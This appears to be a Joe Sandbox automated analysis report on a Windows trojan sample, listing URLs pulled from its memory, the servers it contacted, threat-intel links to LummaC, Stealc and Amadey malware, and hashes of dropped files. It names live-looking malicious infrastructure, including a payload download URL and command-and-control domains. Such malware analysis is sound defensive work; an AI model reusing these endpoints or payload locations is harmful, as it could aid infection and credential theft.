http://store.steampowered.com/subscriber_agreement/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000094F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://medal.tv	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeZ0	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/api5	8BB0.tmp.exe, 00000002.00000002.2550654344.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/workshop/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeR8	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/9	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe0	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://recaptcha.net	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900Y	8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://store.steampowered.com/	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe$	DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.77.249.79	deafeninggeh.biz	United States	20473	AS-CHOOPAUS	false
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
104.131.68.180	immureprech.biz	United States	14061	DIGITALOCEAN-ASNUS	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false
104.121.10.34	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576510
Start date and time:	2024-12-17 08:17:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DG55Gu1yGM.exe renamed because original name is a hash value
Original Sample Name:	f5f01c71d9ad196656cdceef7c1f12e6.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@11/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 42 Number of non-executed functions: 348
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 20.12.23.50, 40.126.53.17
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:18:41	API Interceptor	8900110x Sleep call for process: DG55Gu1yGM.exe modified
02:18:47	API Interceptor	7x Sleep call for process: 8BB0.tmp.exe modified
02:19:22	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.77.249.79	UoktqWamLR.exe	Get hash	malicious	AZORult	Browse	ehzwq.shop/erd/mac/index.php
	RgZaLjgCto.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/
	java.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/
104.21.56.70	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse
	ief722WreR.exe	Get hash	malicious	Stealc	Browse
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse
104.131.68.180	java.exe	Get hash	malicious	Tinba	Browse	uyhgqunqkxnx.pw/EiDQjNbWEQ/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
deafeninggeh.biz	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.131.68.180
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.131.68.180
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.16.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
steamcommunity.com	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	23.37.186.133
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.121.10.34
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.37.186.133
post-to-me.com	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
immureprech.biz	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	45.77.249.79
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.207.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	45.77.249.79
	Setup.exe (1).zip	Get hash	malicious	Unknown	Browse	209.222.21.115
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	45.77.249.79
	mips.elf	Get hash	malicious	Unknown	Browse	149.248.45.75
	bot.spc.elf	Get hash	malicious	Mirai	Browse	45.32.181.8
	rebirth.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	108.61.131.209
	Setup.msi	Get hash	malicious	Unknown	Browse	45.77.249.79
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	45.63.66.114
	file.exe	Get hash	malicious	FormBook	Browse	45.76.104.174
DIGITALOCEAN-ASNUS	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	174.138.125.138
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.131.68.180
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	178.62.201.34
	Client-built.exe	Get hash	malicious	Quasar	Browse	138.68.79.95
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180
	PO DOC.html	Get hash	malicious	HTMLPhisher	Browse	164.90.188.192
CLOUDFLARENETUS	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	104.21.87.65
	1iC0WTxgUf.exe	Get hash	malicious	Unknown	Browse	104.18.0.75
	Instruction_695-18112-002_Rev.PDF.lnk.d.lnk	Get hash	malicious	Unknown	Browse	104.21.83.229
	https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637	Get hash	malicious	Unknown	Browse	104.17.25.14
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	104.21.84.67
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	172.65.156.157
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
SELECTELRU	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	176.113.115.178
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	176.113.115.19
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	176.113.115.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180 104.121.10.34 45.77.249.79
37f463bf4616ecd445d4a1937da06e19	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	104.21.56.70
	1iC0WTxgUf.exe	Get hash	malicious	Unknown	Browse	104.21.56.70
	Instruction_695-18112-002_Rev.PDF.lnk.d.lnk	Get hash	malicious	Unknown	Browse	104.21.56.70
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	104.21.56.70
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.56.70
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8BB0.tmp.exe_28aad63d69ff1035b1b6e3684f6f9364372fce_246ce6f4_a6630b94-fb28-40b1-8692-d2e17ab5d204\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9579107995262098
Encrypted:	false
SSDEEP:	96:WC1An1esSh4Bo74sfNUQXIDcQDc6/cEOcw30+HbHg/8BRTf3Oy1E45WAU6NCUtW9:6n1eAdWb0N7UBju3RzuiFuZ24IO85
MD5:	4FA365A52D4AEFE016091E15512651EC
SHA1:	E013D5192C5CE61D435B99CE2001A7FF2CB251C3
SHA-256:	C91F06008A12A46934CBA545D5AD289C6DE7578700C217E294560F91CD83A3AA
SHA-512:	7197BC983133909C63F68E3BBE32955209CAC39FAB2857EF2DB4F5D69CAA43D5A88A8EDCA95177D223A6FE261F164B1B973B674684A29898E1DE14A7B8D11F14
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.9.3.5.3.6.4.2.2.4.9.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.9.3.5.3.6.8.5.9.9.9.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.6.3.0.b.9.4.-.f.b.2.8.-.4.0.b.1.-.8.6.9.2.-.d.2.e.1.7.a.b.5.d.2.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.3.4.d.3.4.a.-.d.f.9.5.-.4.4.3.c.-.b.8.6.4.-.7.a.4.c.b.5.d.5.b.5.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.B.B.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.8.-.0.0.0.1.-.0.0.1.4.-.6.c.2.b.-.e.7.e.7.5.3.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.b.b.5.d.9.2.d.9.8.0.a.b.9.7.a.4.d.2.4.0.b.0.1.3.8.1.e.f.5.2.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.a.8.a.d.3.d.9.2.a.5.a.5.7.f.0.7.5.d.e.4.0.c.c.3.a.6.3.9.1.d.b.a.2.7.9.e.c.1.!.8.B.B.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 17 07:18:56 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	45886
Entropy (8bit):	2.5564247196369805
Encrypted:	false
SSDEEP:	192:w9wfbXECOKV4mVOx1BiNOiAeb43Rzx13LhpcUaJ0lrcqdsRuakDkWdSq:H6KVR4TBLiAebquP0ljCjkvR
MD5:	E22CDB02A481225D4338BB304BAB5264
SHA1:	28145657FCADFF400DFE58984B6DA3762701CC61
SHA-256:	5D27D3D8F8EDEB1613DA4B33D8D0F7A62A1F0460E1B20B210A3863E12CD36200
SHA-512:	EC725F48C15EC6900AD77B1980A56182C78BED85087082A2D37968779E8BBA6BC1BD47E7FCED874C495DD9BCCAA21C960BDCF0BE2000706E690AB8DB0828FFF7
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........%ag............4...............H...........<.......t...\|-..........`.......8...........T............@...r......................................................................................................eJ......t ......GenuineIntel............T............%ag.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90B2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8288
Entropy (8bit):	3.699093105152641
Encrypted:	false
SSDEEP:	192:R6l7wVeJp36iB6YXd6Ikgmfw1UjppDO89bmSsf0oKACm:R6lXJ56E6Yt67gmfVLmRfj7
MD5:	D7160B04933C28F3170EA97257514909
SHA1:	ED74DFD1FFE427D4A82DCC9679E8B2231B6D16E4
SHA-256:	E538EC46C6BF103D9B187D060FF085B2C13B7C750B320718990F8DFA97E2DE2E
SHA-512:	B03A4798E33879F706AC45C129AFB0E4C3667A69484372F9105AD5AC85F410E6A298261BC29A85311677602980B8F9B590A342C42277588D283F7205A80186F3
Malicious:	false
Reputation:	low
